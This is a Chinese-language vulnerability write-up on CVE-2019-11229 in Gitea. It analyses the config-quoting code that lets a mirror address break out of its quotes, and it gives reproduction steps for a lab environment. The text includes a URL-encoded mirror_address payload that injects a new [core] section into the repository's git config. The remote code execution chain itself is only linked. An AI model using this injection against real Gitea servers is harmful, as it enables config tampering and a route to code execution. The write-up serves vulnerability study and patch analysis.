git config可控-RCE(CVE-2019-11229)

环境

http://image.lou00.top/dockerfile/CVE-2019-11229.zip

补丁

https://github.com/go-gitea/gitea/pull/6595/commits/52af826a7aa1df6ab538d881db236698cb367cd7

将文件写入直接换成了代码执行

分析

跟进SaveToIndent

1
2
3
4
5
6
7
8
9
10
func (f *File) SaveToIndent(filename, indent string) error {
// Note: Because we are truncating with os.Create,
// so it's safer to save to a temporary file location and rename afte done.
buf, err := f.writeToBuffer(indent)
if err != nil {
return err
}

return ioutil.WriteFile(filename, buf.Bytes(), 0666)
}

继续跟进writeToBuffer

1
2
3
4
5
if strings.ContainsAny(val, "\n`") {
val = `"""` + val + `"""`
} else if !f.options.IgnoreInlineComment && strings.ContainsAny(val, "#;") {
val = "`" + val + "`"
}

如果存在换行就用"""框住
val是可控的可以输入"""这就构成了漏洞点

复现

点击迁移外部仓库
创建一个镜像库

发现其配置文件在gitea-repositories/username/test_gitea.git/config

1
2
3
4
5
6
7
8
9
10
[core]
repositoryformatversion = 0
filemode = true
bare = true
ignorecase = true
precomposeunicode = true
[remote "origin"]
url = https://github.com/Lou00/test_gitea
fetch = +refs/*:refs/*
mirror = true


抓包修改mirror_address字段

https%3A%2F%2Fgithub.com%2FLou00%2Ftest_gitea"""%0d%0a[core]%0d%0atest=/tmp%0d%0aa="""
发现config文件被修改

再次点击更新仓库设置,会自动格式化

利用链以及参考

https://www.lorexxar.cn/2019/07/23/gitea-cve-2019-11229/
https://www.jianshu.com/p/684fa071026a
https://www.lz1y.cn/2019/07/20/CVE-2019-11229-Gitea-RCE/